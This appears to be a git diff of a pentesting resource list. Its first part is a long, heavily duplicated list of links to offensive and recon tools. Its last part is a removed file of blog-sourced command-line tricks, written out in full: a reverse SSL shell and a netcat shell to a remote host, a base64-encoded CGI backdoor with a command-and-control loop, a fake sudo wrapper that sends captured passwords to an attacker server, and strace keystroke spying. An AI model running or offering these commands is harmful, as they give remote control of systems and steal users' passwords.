* Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
[SPScan]http://sourceforge.net/projects/spscan/)
* SPScan is a tool written in Ruby that enumerates a SharePoint installation gathering information about the version and installed plugins.
#### Active Directory
[SPartan](https://github.com/sensepost/SPartan)
* SPartan is a Frontpage and Sharepoint fingerprinting and attack tool
[Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2](http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/)
[MS Network Level Authentication](https://technet.microsoft.com/en-us/magazine/hh750380.aspx)
[Windows Attacks AT is the new black](https://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607)
[Dragon: A Windows, non-binding, passive download / exec backdoor](http://www.shellntel.com/blog/2015/6/11/dragon-a-windows-non-binding-passive-downloadexec-backdoor)
[Attacking ADFS Endpoints with PowerShell](http://www.irongeek.com/i.php?page=videos/derbycon6/118-attacking-adfs-endpoints-with-powershell-karl-fosaaen)
[ms15-034.nse Script](https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse)
[PowerShell-AD-Recon](https://github.com/PyroTek3/PowerShell-AD-Recon)
* AD PowerShell Recon Scripts
[Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)
* Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.
* [Presentation](https://www.youtube.com/watch?v=P1lkflnWb0I)
[Netview](https://github.com/mubix/netview)
* Netview is a enumeration tool. It uses (with the -d) the current domain or a specified domain (with the -d domain) to enumerate hosts
[How to Bypass Anti-Virus to Run Mimikatz](http://www.blackhillsinfosec.com/?p=5555)
[LLMNR and NBT-NS Poisoning Using Responder](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
[Attacking ADFS Endpoints with PowerShell](http://www.irongeek.com/i.php?page=videos/derbycon6/118-attacking-adfs-endpoints-with-powershell-karl-fosaaen)
[Introducing PowerShell into your Arsenal with PS>Attack - Jared Haight](http://www.irongeek.com/i.php?page=videos/derbycon6/119-introducing-powershell-into-your-arsenal-with-psattack-jared-haight)
### <a name="tools">Tools</a>
#### Sharepoint
[Sparty - MS Sharepoint and Frontpage Auditing Tool](http://sparty.secniche.org/)
* Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.
[digbit](https://github.com/mnmnc/digbit/blob/master/README.md)
* Automatic domain generation for BitSquatting
[SPScan](http://sourceforge.net/projects/spscan/)
* SPScan is a tool written in Ruby that enumerates a SharePoint installation gathering information about the version and installed plugins.
[discover - Kali Scripts](https://github.com/leebaird/discover)
* For use with Kali Linux - custom bash scripts used to automate various portions of a pentest.
[SPartan](https://github.com/sensepost/SPartan)
* SPartan is a Frontpage and Sharepoint fingerprinting and attack tool
[w3af](https://github.com/andresriancho/w3af)
* w3af: web application attack and audit framework, the open source web vulnerability scanner.
#### Network based
[Yersinia](http://www.yersinia.net/)
* Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
[CiscoRouter - tool](https://github.com/ajohnston9/ciscorouter)
* CiscoRouter is a tool for scanning Cisco-based routers over SSH. Rules can be created using accompanying CiscoRule application (see this repo) and stored in the "rules" directory.
[Responder](https://github.com/SpiderLabs/Responder/)
* Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
[MS Network Level Authentication](https://technet.microsoft.com/en-us/magazine/hh750380.aspx)
[PowerShell-AD-Recon](https://github.com/PyroTek3/PowerShell-AD-Recon)
* AD PowerShell Recon Scripts
[Enum4Linux](https://labs.portcullis.co.uk/tools/enum4linux/)
* Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup. The tool usage can be found below followed by examples, previous versions of the tool can be found at the bottom of the page.
[NbtScan](http://www.unixwiz.net/tools/nbtscan.html)
* This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. It is based on the functionality of the standard Windows tool nbtstat, but it operates on a range of addresses instead of just one. I wrote this tool because the existing tools either didn't do what I wanted or ran only on the Windows platforms: mine runs on just about everything.
[netcat](http://nc110.sourceforge.net/)
* Network Swiss army knife. Ncat’s predecessor. Does everything and the kitchen sink.
[Ncat](http://nmap.org/)
* Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.
[DNSEnum](https://github.com/fwaeytens/dnsenum)
* Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.
[Enum4Linux](https://labs.portcullis.co.uk/tools/enum4linux/)
* Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup. The tool usage can be found below followed by examples, previous versions of the tool can be found at the bottom of the page.
### <a name="tools">Tools</a>
[TXTDNS](http://www.txdns.net/)
* TXDNS is a Win32 aggressive multithreaded DNS digger. Capable of placing, on the wire, thousands of DNS queries per minute. TXDNS main goal is to expose a domain namespace trough a number of techniques: Typos: Mised, doouble and transposde keystrokes; TLD/ccSLD rotation; Dictionary attack; Full Brute-force attack using alpha, numeric or alphanumeric charsets; Reverse grinding.
[JXplorer](http://jxplorer.org/)
* JXplorer is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used to search, read and edit any standard LDAP directory, or any directory service with an LDAP or DSML interface. It is highly flexible and can be extended and customised in a number of ways. JXplorer is written in java, and the source code and Ant build system are available via svn or as a packaged build for users who want to experiment or further develop the program.
[LDAPMfINER](http://ldapminer.sourceforge.net/)
* This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C
[digbit](https://github.com/mnmnc/digbit/blob/master/README.md)
* Automatic domain generation for BitSquatting
[Yersinia](http://www.yersinia.net/)
* Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
[Firewalk](http://packetfactory.openwall.net/projects/firewalk/)
* Firewalk is an active reconnaissance network security tool that attempts to determine what layer 4 protocols a given IP forwarding device will pass. Firewalk works by sending out TCP or UDP packets with a TTL one greater than the targeted gateway. If the gateway allows the traffic, it will forward the packets to the next hop where they will expire and elicit an ICMP_TIME_EXCEEDED message. If the gateway hostdoes not allow the traffic, it will likely drop the packets on the floor and we will see no response. To get the correct IP TTL that will result in expired packets one beyond the gateway we need to ramp up hop-counts. We do this in the same manner that traceroute works. Once we have the gateway hopcount (at that point the scan is said to be `bound`) we can begin our scan.
[netcat](http://nc110.sourceforge.net/)
* Network Swiss army knife. Ncat’s predecessor. Does everything and the kitchen sink.
[Softera LDAP Browser](http://www.ldapbrowser.com/info_softerra-ldap-browser.htm)
* LDAP Browser that supports most LDAP implementations. Non-free software, 30-day free trial
[Tinfoleak](http://vicenteaguileradiaz.com/tools/)
* tinfoleak is a simple Python script that allow to obtain:
..* basic information about a Twitter user (name, picture, location, followers, etc.)
..* devices and operating systems used by the Twitter user
..* applications and social networks used by the Twitter user
..* place and geolocation coordinates to generate a tracking map of locations visited
..* show user tweets in Google Earth!
..* download all pics from a Twitter user
..* hashtags used by the Twitter user and when are used (date and time)
..* user mentions by the the Twitter user and when are occurred (date and time)
..* topics used by the Twitter user
[Ncat](http://nmap.org/)
* Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.
[net-creds](https://github.com/DanMcInerney/net-creds)
* Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification
* It sniffs: URLs visited; POST loads sent; HTTP form logins/passwords; HTTP basic auth logins/passwords; HTTP searches; FTP logins/passwords; IRC logins/passwords; POP logins/passwords; IMAP logins/passwords; Telnet logins/passwords; SMTP logins/passwords; SNMP community string; NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc; Kerberos.
[RANCID - Really Awesome New Cisco confIg Differ](http://www.shrubbery.net/rancid/)
* RANCID monitors a router's (or more generally a device's) configuration, including software and hardware (cards, serial numbers, etc) and uses CVS (Concurrent Version System) or Subversion to maintain history of changes.
* RANCID does this by the very simple process summarized as: login to each device in the router table (router.db), run various commands to get the information that will be saved, cook the output; re-format, remove oscillating or incrementing data, email any differences (sample) from the previous collection to a mail list, and finally commit those changes to the revision control system
[Stenographer](https://github.com/google/stenographer/blob/master/README.md)
* Stenographer is a full-packet-capture utility for buffering packets to disk for intrusion detection and incident response purposes. It provides a high-performance implementation of NIC-to-disk packet writing, handles deleting those files as disk fills up, and provides methods for reading back specific sets of packets quickly and easily.
[Netview](https://github.com/mubix/netview)
* Netview is a enumeration tool. It uses (with the -d) the current domain or a specified domain (with the -d domain) to enumerate hosts
[DNS Recon](https://github.com/darkoperator/dnsrecon)
#### LDAP
[DNS Dumpster](DNSdumpster.com is a free domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process.)
[OnionScan](https://github.com/s-rah/onionscan)
* [What OnionScan Scans for](https://github.com/s-rah/onionscan/blob/master/doc/what-is-scanned-for.md)
[JXplorer](http://jxplorer.org/)
* JXplorer is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used to search, read and edit any standard LDAP directory, or any directory service with an LDAP or DSML interface. It is highly flexible and can be extended and customised in a number of ways. JXplorer is written in java, and the source code and Ant build system are available via svn or as a packaged build for users who want to experiment or further develop the program.
[scanless](https://github.com/vesche/scanless)
* Command-line utility for using websites that can perform port scans on your behalf. Useful for early stages of a penetration test or if you'd like to run a port scan on a host and have it not come from your IP address.
[LDAPMfINER](http://ldapminer.sourceforge.net/)
* This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C
[dvcs-ripper](https://github.com/kost/dvcs-ripper)
* Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... It can rip repositories even
when directory browsing is turned off.
[Softera LDAP Browser](http://www.ldapbrowser.com/info_softerra-ldap-browser.htm)
* LDAP Browser that supports most LDAP implementations. Non-free software, 30-day free trial
[sshuttle](https://github.com/apenwarr/sshuttle)
* Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
@ -255,7 +206,9 @@ dsniff is a collection of tools for network auditing and penetration testing. ds
[WSUXploit](https://github.com/pimps/wsuxploit)
* This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation, 'WSUSpect – Compromising the Windows Enterprise via Windows Update'
[net-creds](https://github.com/DanMcInerney/net-creds)
* Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification
* It sniffs: URLs visited; POST loads sent; HTTP form logins/passwords; HTTP basic auth logins/passwords; HTTP searches; FTP logins/passwords; IRC logins/passwords; POP logins/passwords; IMAP logins/passwords; Telnet logins/passwords; SMTP logins/passwords; SNMP community string; NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc; Kerberos.
@ -264,31 +217,69 @@ dsniff is a collection of tools for network auditing and penetration testing. ds
### Scanners
[SQLMap](https://github.com/sqlmapproject/sqlmap)
* sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
[scanless](https://github.com/vesche/scanless)
* Command-line utility for using websites that can perform port scans on your behalf. Useful for early stages of a penetration test or if you'd like to run a port scan on a host and have it not come from your IP address.
[ms15-034.nse Script](https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse)
#### DNS:
[DNSRecon](https://github.com/darkoperator/dnsrecon)
* [Quick Reference Guide](http://pentestlab.wordpress.com/2012/11/13/dns-reconnaissance-dnsrecon/)
[WPScan](https://github.com/wpscanteam/wpscan)
* WPScan is a black box WordPress vulnerability scanner.
[dns-discovery](https://github.com/mafintosh/dns-discovery)
* Discovery peers in a distributed system using regular dns and multicast dns.
[Enumerator](https://pypi.python.org/pypi/enumerator/0.1.4)
* enumerator is a tool built to assist in automating the often tedious task of enumerating a target or list of targets during a penetration test.
[Knockpy](https://github.com/guelfoweb/knock)
* Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled.
[Unicornscan](http://www.unicornscan.org/)
* Unicornscan is a new information gathering and correlation engine built for and by members of the security research and testing communities. It was designed to provide an engine that is Scalable, Accurate, Flexible, and Efficient. It is released for the community to use under the terms of the GPL license.
[sub6](https://github.com/YasserGersy/sub6)
* subdomain take over detector and crawler
[hostmap](https://github.com/jekil/hostmap)
* hostmap is a free, automatic, hostnames and virtual hosts discovery tool written in Ruby by Alessandro Tanasi
[enumall](https://github.com/Dhayalan96/enumall)
* Script to enumerate subdomains, leveraging recon-ng. Uses google scraping, bing scraping, baidu scraping, yahoo scarping, netcraft, and bruteforces to find subdomains. Plus resolves to IP.
[dns-parallel-prober](https://github.com/lorenzog/dns-parallel-prober)
* This script is a proof of concept for a parallelised domain name prober. It creates a queue of threads and tasks each one to probe a sub-domain of the given root domain. At every iteration step each dead thread is removed and the queue is replenished as necessary.
[Altdns](https://github.com/infosec-au/altdns)
* Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.
[AQUATONE](https://github.com/michenriksen/aquatone)
* AQUATONE is a set of tools for performing reconnaissance on domain names. It can discover subdomains on a given domain by using open sources as well as the more common subdomain dictionary brute force approach. After subdomain discovery, AQUATONE can then scan the hosts for common web ports and HTTP headers, HTML bodies and screenshots can be gathered and consolidated into a report for easy analysis of the attack surface.
[Sublist3r](https://github.com/aboul3la/Sublist3r)
* Fast subdomains enumeration tool for penetration testers
[DNS Recon](https://github.com/darkoperator/dnsrecon)
[DNS Dumpster](DNSdumpster.com is a free domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process.)
[TXTDNS](http://www.txdns.net/)
* TXDNS is a Win32 aggressive multithreaded DNS digger. Capable of placing, on the wire, thousands of DNS queries per minute. TXDNS main goal is to expose a domain namespace trough a number of techniques: Typos: Mised, doouble and transposde keystrokes; TLD/ccSLD rotation; Dictionary attack; Full Brute-force attack using alpha, numeric or alphanumeric charsets; Reverse grinding.
[DNSEnum](https://github.com/fwaeytens/dnsenum)
* Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.
#### Email
[SIMPLYEMAIL](https://github.com/killswitch-GUI/SimplyEmail)
* What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.
#### Network Host/Service:
[Nmap](http://nmap.org/)
* Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
[Angry IP Scanner](http://angryip.org/
[Enumerator](https://pypi.python.org/pypi/enumerator/0.1.4)
* enumerator is a tool built to assist in automating the often tedious task of enumerating a target or list of targets during a penetration test.
[hostmap](https://github.com/jekil/hostmap)
* hostmap is a free, automatic, hostnames and virtual hosts discovery tool written in Ruby by Alessandro Tanasi
[Angry IP Scanner](http://angryip.org/)
* Angry IP Scanner (or simply ipscan) is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports as well as has many other features.
[UnicornScan](http://www.unicornscan.org/)
@ -298,51 +289,78 @@ dsniff is a collection of tools for network auditing and penetration testing. ds
[hping](http://www.hping.org/)
* hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
[Onesixtyone](http://www.phreedom.org/software/onesixtyone/)
* onesixtyone is an SNMP scanner which utilizes a sweep technique to achieve very high performance. It can scan an entire class B network in under 13 minutes. It can be used to discover devices responding to well-known community names or to mount a dictionary attack against one or more SNMP devices.
[WhatWeb](https://github.com/urbanadventurer/WhatWeb)
* WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
[Unicornscan](http://www.unicornscan.org/)
* Unicornscan is a new information gathering and correlation engine built for and by members of the security research and testing communities. It was designed to provide an engine that is Scalable, Accurate, Flexible, and Efficient. It is released for the community to use under the terms of the GPL license.
[Consul](https://github.com/hashicorp/consul)
* Consul is a tool for service discovery and configuration. Consul is distributed, highly available, and extremely scalable.
[SNMPWALK](http://net-snmp.sourceforge.net/docs/man/snmpwalk.html)
* snmpwalk - retrieve a subtree of management values using SNMP GETNEXT requests
[CloudFail](https://github.com/m0rtem/CloudFail)
* CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server.
[webDisco](https://github.com/joeybelans/webDisco)
* Web discovery tool to capture screenshots from a list of hosts & vhosts. Requests are made via IP address and vhosts to determine differences. Additionallty checks for common administrative interfaces and web server misconfigurations.
[discover - Kali Scripts](https://github.com/leebaird/discover)
* For use with Kali Linux - custom bash scripts used to automate various portions of a pentest.
[Firewalk](http://packetfactory.openwall.net/projects/firewalk/)
* Firewalk is an active reconnaissance network security tool that attempts to determine what layer 4 protocols a given IP forwarding device will pass. Firewalk works by sending out TCP or UDP packets with a TTL one greater than the targeted gateway. If the gateway allows the traffic, it will forward the packets to the next hop where they will expire and elicit an ICMP_TIME_EXCEEDED message. If the gateway hostdoes not allow the traffic, it will likely drop the packets on the floor and we will see no response. To get the correct IP TTL that will result in expired packets one beyond the gateway we need to ramp up hop-counts. We do this in the same manner that traceroute works. Once we have the gateway hopcount (at that point the scan is said to be `bound`) we can begin our scan.
[CiscoRouter - tool](https://github.com/ajohnston9/ciscorouter)
* CiscoRouter is a tool for scanning Cisco-based routers over SSH. Rules can be created using accompanying CiscoRule application (see this repo) and stored in the "rules" directory.
#### SSH:
[ssh-audit](https://github.com/arthepsy/ssh-audit)
* SSH server auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)
[Knockpy](https://github.com/guelfoweb/knock)
* Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled.
[sub6](https://github.com/YasserGersy/sub6)
* subdomain take over detector and crawler
[CloudFail](https://github.com/m0rtem/CloudFail)
* CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server.
[AQUATONE](https://github.com/michenriksen/aquatone)
* AQUATONE is a set of tools for performing reconnaissance on domain names. It can discover subdomains on a given domain by using open sources as well as the more common subdomain dictionary brute force approach. After subdomain discovery, AQUATONE can then scan the hosts for common web ports and HTTP headers, HTML bodies and screenshots can be gathered and consolidated into a report for easy analysis of the attack surface.
[Sublist3r](https://github.com/aboul3la/Sublist3r)
* Fast subdomains enumeration tool for penetration testers
#### SQL:
[Altdns](https://github.com/infosec-au/altdns)
* Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.
[SQLMap](https://github.com/sqlmapproject/sqlmap)
* sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
[PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server](https://github.com/NetSPI/PowerUpSQL)
* The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation on scale. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that could be used by administrators to quickly inventory the SQL Servers in their ADS domain.
* [Documentation](https TLS/SSL Vulnerabilities ://github.com/NetSPI/PowerUpSQL/wiki)
* [Overview of PowerUpSQL](https://github.com/NetSPI/PowerUpSQL/wiki/Overview-of-PowerUpSQL)
#### Netbios
[NbtScan](http://www.unixwiz.net/tools/nbtscan.html)
* This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. It is based on the functionality of the standard Windows tool nbtstat, but it operates on a range of addresses instead of just one. I wrote this tool because the existing tools either didn't do what I wanted or ran only on the Windows platforms: mine runs on just about everything.
#### SMTP:
#### SNMP:
[Onesixtyone](http://www.phreedom.org/software/onesixtyone/)
* onesixtyone is an SNMP scanner which utilizes a sweep technique to achieve very high performance. It can scan an entire class B network in under 13 minutes. It can be used to discover devices responding to well-known community names or to mount a dictionary attack against one or more SNMP devices.
[SNMPWALK](http://net-snmp.sourceforge.net/docs/man/snmpwalk.html)
* snmpwalk - retrieve a subtree of management values using SNMP GETNEXT requests
#### SIP:
[sipvicious](https://github.com/EnableSecurity/sipvicious)
#### MISC:
[t50 - the fastest packet injector.](https://github.com/fredericopissarra/t50)
* T50 was designed to perform “Stress Testing” on a variety of infra-structure
network devices (Version 2.45), using widely implemented protocols, and after
@ -351,21 +369,35 @@ covering some regular protocols (ICMP, TCP and UDP), some infra-structure
specific protocols (GRE, IPSec and RSVP), and some routing protocols (RIP,
EIGRP and OSPF).
[gateway-finder](https://github.com/pentestmonkey/gateway-finder)
* Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.
[a](https://github.com/fmtn/a)
* ActiveMQ CLI testing and message management
[dns-parallel-prober](https://github.com/lorenzog/dns-parallel-prober)
* This script is a proof of concept for a parallelised domain name prober. It creates a queue of threads and tasks each one to probe a sub-domain of the given root domain. At every iteration step each dead thread is removed and the queue is replenished as necessary.
[OnionScan](https://github.com/s-rah/onionscan)
* [What OnionScan Scans for](https://github.com/s-rah/onionscan/blob/master/doc/what-is-scanned-for.md)
[gateway-finder](https://github.com/pentestmonkey/gateway-finder)
* Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.
[enumall](https://github.com/Dhayalan96/enumall)
* Script to enumerate subdomains, leveraging recon-ng. Uses google scraping, bing scraping, baidu scraping, yahoo scarping, netcraft, and bruteforces to find subdomains. Plus resolves to IP.
#### Web:
[WPScan](https://github.com/wpscanteam/wpscan)
* WPScan is a black box WordPress vulnerability scanner.
[WhatWeb](https://github.com/urbanadventurer/WhatWeb)
* WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
[webDisco](https://github.com/joeybelans/webDisco)
* Web discovery tool to capture screenshots from a list of hosts & vhosts. Requests are made via IP address and vhosts to determine differences. Additionallty checks for common administrative interfaces and web server misconfigurations.
[w3af](https://github.com/andresriancho/w3af)
* w3af: web application attack and audit framework, the open source web vulnerability scanner.
@ -422,7 +454,8 @@ EIGRP and OSPF).
[DNS hijacking using cloud providers - Frans Rosén](https://www.youtube.com/watch?v=HhJv8CU-RIk)
[VLAN hopping, ARP Poisoning and Man-In-The-Middle Attacks in Virtualized Environments - Ronny L. Bull - ANYCON 2017](http://www.irongeek.com/i.php?page=videos/anycon2017/110-vlan-hopping-arp-poisoning-and-man-in-the-middle-attacks-in-virtualized-environments-dr-ronny-l-bull)
* Cloud service providers and data centers offer their customers the ability to deploy virtual machines within multi-tenant environments. These virtual machines are typically connected to the physical network via a virtualized network configuration. This could be as simple as a bridged interface to each virtual machine or as complicated as a virtual switch providing more robust networking features such as VLANs, QoS, and monitoring. In this talk I will demonstrate the effects of VLAN hopping, ARP poisoning and Man-in-the-Middle attacks across every major hypervisor platform, including results of attacks originating from the physically connected network as well as within the virtual networks themselves. Each attack category that is discussed will be accompanied by a detailed proof of concept demonstration of the attack.


+ 0
- 92
Draft/Network Attacks & Defenses/Getting Busy at the Command Line.txt View File

@ -1,92 +0,0 @@
http://0xthem.blogspot.com/2014/08/getting-busy-at-command-line.html
Reverse SSL Shell:
A simple reverse shell using fifos and openssl s_client. There's a great deal you can do with this tool, take a look at the server options.
mkfifo /tmp/sfd; /bin/bash -i < /tmp/sfd 2>&1 | openssl s_client -quiet -connect <RHOST>:<RPORT> > /tmp/sfd; rm /tmp/sfd
Resurrecting Netcat:
There are plenty of ways (pipes) to resurrect good old netcat, but have you ever looked inside of the nc applet in BusyBox? [-e PROG] is still a valid argument.
busybox nc <RHOST> <RPORT> -e /bin/busybox ash
CGI Shell via BusyBox Httpd:
Ever browse the source of some of the tools on your box? Here's a little cgi shell using the httpd applet in BusyBox.
Httpd Backdoor
mkdir -p /tmp/s/cgi-bin;(base64 -d <<<IyEvYmluL2Jhc2gKaWYgWyAiJFJFUVVFU1RfTUVUSE9EIiA9PSAiSEVBRCIgXSAmJiBbICIkSFRUUF9VU0VSX0FHRU5UIiA9PSAibm9wZSIgXTsgdGhlbgogICAgQz0kKGJhc2U2NCAtZCA8PDwgJFFVRVJZX1NUUklORykKICAgIGlmIFsgIiRDIiA9PSAiZXhpdCIgXTsgdGhlbgogICAgICAgIGVjaG8gIkNsZWFuIgogICAgICAgIHJtIC4vcAogICAgICAgIGtpbGwgJChwZ3JlcCBidXN5Ym94KQogICAgIGZpCiAgICAgZWNobyAkKGJhc2ggLWMgIiRDIikKZmkK)>/tmp/s/cgi-bin/p;chmod +x /tmp/s/cgi-bin/p; busybox httpd -f -p <LPORT> -h /tmp/s/; rm -rf /tmp/s/
Self-Cleaning CGI Bash Shell
Our backdoor is in the base64 above, and looks like the following.
Maybe we want to restrict access by HTTP method or user agent? We can utilize the env vars passed to the httpd. Might as well clean up after ourselves while we are at it.
#!/bin/bash
if [ "$REQUEST_METHOD" == "HEAD" ] && [ "$HTTP_USER_AGENT" == "nope" ]; then
C=$(base64 -d <<< $QUERY_STRING)
if [ "$C" == "exit" ]; then
echo "Clean"
rm ./p
kill $(pgrep busybox)
fi
echo $(bash -c "$C")
fi
C2
Now whip up a quick loop on our controlling host that meets our triggers.
COMMAND=''; while [ "$COMMAND" != "exit" ]; do read -p "$ " COMMAND; echo -e "HEAD /cgi-bin/p?$(base64<<<$COMMAND) HTTP/1.0\nHost: \nUser-Agent: nope\n\n" | ncat <RHOST> <RPORT>; done
RSA Keys as Vars:
Need our httpd cgi shell encrypted? Why not toss some RSA keys into variables via file pipes.
myfullKey=$(openssl genrsa 2048 -outfile)
mypubkey=$(openssl rsa -in <(echo "$myfullKey") -pubout)
To get around key to data size issues, (and be more correct) use these to handle symmetric keys.
I'll leave exact implementation up to you. The point of this post is to inspire ideas, get tinkering!
openssl aes-256-cbc [-d] -pass pass:<symetric_key> -a
Privileged Escalation with Shell Wrappers:
last and history tell us a user logs on frequently and uses the sudo command.
We could use LD_PRELOAD... or simply wrap sudo in a argument expanding function.
We force a sudo timeout, fake an incorrect password entry, send the password encrypted to our server, then issue the user's original command by expanding their arguments.
sudo () { /bin/echo [sudo] password for $USER: ; read -s yoink; openssl s_client -quiet -no_ign_eof -connect <RHOST>:<RPORT> <<<$USER:$yoink 2> /dev/null; echo "Sorry, try again."; /usr/bin/sudo -k; /usr/bin/sudo "$@"; }
Why bother cracking a password when you can have a user type it for you?
This can also be done with an alias. Which can be hidden with control characters (think ^M).
Spy on Stdin by Tracing System Calls:
Need to know what a user is typing in their tty?
sudo strace -f -p <tty_pid> 2>&1 | grep -o -e 'read(., \".*", 1)'
Note: We follow forks with -f in order to grab subprocess and sudo password input.
Fun with stdin Pipes:
